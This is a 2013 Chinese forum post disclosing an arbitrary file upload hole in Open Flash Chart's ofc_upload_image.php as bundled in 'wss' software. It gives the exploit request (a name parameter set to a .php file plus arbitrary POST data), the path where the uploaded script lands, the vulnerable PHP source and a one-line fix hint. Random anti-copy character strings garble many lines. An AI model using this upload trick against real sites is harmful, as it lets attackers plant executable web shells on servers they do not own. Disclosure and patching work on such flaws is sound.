POST 数据漏洞文件执行任意后缀文件保存 X% @$ B7 K* g' ]/ p& s
漏洞文件/chart/php-ofc-library/ofc_upload_image.php0 {# l% r; V! g$ ]+ m
q; b* i5 i6 Y, n/ b
利用:
: b, s; p& @* s* u3 S8 Z/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名: @2 S! ]( X8 z: @+ J
' ]4 g- r" p" @4 X# R' A
Post任意数据
" x* ~, Q9 k Z3 O保存位置http://localhost/chart/tmp-upload-images/hfy.php
, @6 W* w( m% O3 D1 G8 Y R/ [1 S/ i
) Z, x' R% _" O最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
5 M* x6 B$ v; d5 C. P0 O! v' d. ^9 O8 m
<?php
# [0 \& A( p, l
8 a# p. Z6 t5 b//' K/ f+ J+ _( J( s6 e
// In Open Flash Chart -> save_image debug mode, you0 e0 G* c5 g. x- G7 }# i& X) a7 J+ w
// will see the 'echo' text in a new window.0 d% m# Y/ n ] t7 S/ m5 K
//
$ M1 \5 l' Q/ p' M" l% v
3 {; R5 ]' D g2 q0 G& D- U/*3 ^( P* R, m3 y+ C% O
0 n M# H) o' I, uprint_r( $_GET );
2 s2 H$ E0 { R7 d3 hprint_r( $_POST );8 D' N0 @5 [# O+ Z1 _8 c3 m6 ]
print_r( $_FILES );
0 N t* t8 r3 s$ s+ m* i$ A+ @& V
7 t3 W U8 H8 t0 [' G. c; ^print_r( $GLOBALS );* W9 m( j- Z# W$ Q
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
' Z+ H% R1 a: Z1 m L% j
$ ?( S/ F: m, a" h" X q*/
4 A1 u# b9 b. r/ X9 x o# ]7 ?# p// default path for the image to be stored //) Z+ U. c& V" D0 `: E3 C+ E3 ~
$default_path = '../tmp-upload-images/';: z& h) x9 Z8 J5 {. H
; _- T- @0 f- Y3 o% tif (!file_exists($default_path)) mkdir($default_path, 0777, true);5 f% Y- \* G4 O( w5 _
( g% C; R3 T+ k) Q. Z* v
// full path to the saved image including filename //4 u: m- B' r1 ]8 b3 t/ m6 K
$destination = $default_path . basename( $_GET[ 'name' ] );
, e$ A7 H* c0 S- r8 n1 }+ W, _! Z9 g8 T, C$ B' R
echo 'Saving your image to: '. $destination;: [+ a( y% A7 S8 f V; y: W
// print_r( $_POST );
+ R/ X! d) y: A// print_r( $_SERVER );1 X$ B$ |6 y% L7 D2 p5 N
// echo $HTTP_RAW_POST_DATA;$ h( V' ?4 g' H; c" a. h
9 M3 Q; ?7 N# @. P//0 f {1 | r2 `! v' I t+ ^) z
// POST data is usually string data, but we are passing a RAW .png u# h# E/ H- ]% K
// so PHP is a bit confused and $_POST is empty. But it has saved# t! A9 K. S+ S# |4 q
// the raw bits into $HTTP_RAW_POST_DATA% k7 `6 @+ D* d; d$ S% m0 n- V
//
" W' T! A4 ~. Y, x; m3 v/ M
! A6 n0 B' k4 s a- T$jfh = fopen($destination, 'w') or die("can't open file");
+ F( m4 B3 ~0 ifwrite($jfh, $HTTP_RAW_POST_DATA);+ v# C$ E7 r8 L
fclose($jfh);
/ h& k5 c0 c( ?
$ m9 P( E" T2 |" V/ M. I: u//
G M( P' a$ u, R/ `7 H7 a// LOOK:
3 P9 d8 y6 N6 F; ~1 M//
! R3 V6 c8 m: ~4 C i3 `8 F9 `- S) _exit();
% x; g4 C K( G//' N& `& O" l/ o
// PHP5:
5 L% i# N. S" \. s1 C//+ R* a* ~0 G. R1 C5 U
h% C9 V$ ~, U2 B
, v3 p2 u; d5 O6 \! i% c* w5 {$ a) L// default path for the image to be stored //
$ e/ i" [4 x h4 }0 D& `. q, k1 ]$default_path = 'tmp-upload-images/';' h- S- q3 T. x+ k: r& ~
1 y( r9 i$ ^4 w$ _# L) {, g7 xif (!file_exists($default_path)) mkdir($default_path, 0777, true);+ F( _- k, K- ]+ j8 X1 |$ [ r
1 ~& \, \5 k. S; x" ~/ N+ d& }// full path to the saved image including filename //
; d3 H5 t. p7 r2 ~ H1 Y/ Y5 u$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); ( q1 ^3 d# T% j5 @
$ z% K3 t7 G% z8 g// move the image into the specified directory //
; v; i- F3 J e9 K7 p+ Aif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {0 o+ A& d! q4 S3 Y8 _
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;"; A# _ X. j# \
} else {
1 Q* O3 |0 S) M* D3 P# b echo "FILE UPLOAD FAILED";
0 L$ M$ ?3 a2 [& c! q9 e- A0 Y}
; H# H7 m, i; m/ K8 Y# o! T$ `# s6 x) c0 I
1 T1 q7 r2 U& J' x, ]/ S5 |
?>2 o+ E0 m- I# a% z
* o2 V9 n* D( P( b
& y3 ` A. X( f/ ?. i1 i7 x9 J5 J" U
& ^% m4 H& J2 N( D" _ [# T; r: P9 R! I& X7 W0 l
+ C) z5 u: T0 g" y; L- y i) Q( \; j6 [/ _" I( T# D ?
修复方案:
% W4 s2 J5 }& f* a这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 3 V3 g# n9 j$ F# T1 R" |9 S/ J
7 I; y# E( D4 i1 u6 d/ G# h# ~4 X/ K. o0 Y- }- T
8 Z- O: p4 [/ g
1 z0 {; r( w7 } |
发表于 2013-2-23 12:38:58
收藏
支持
反对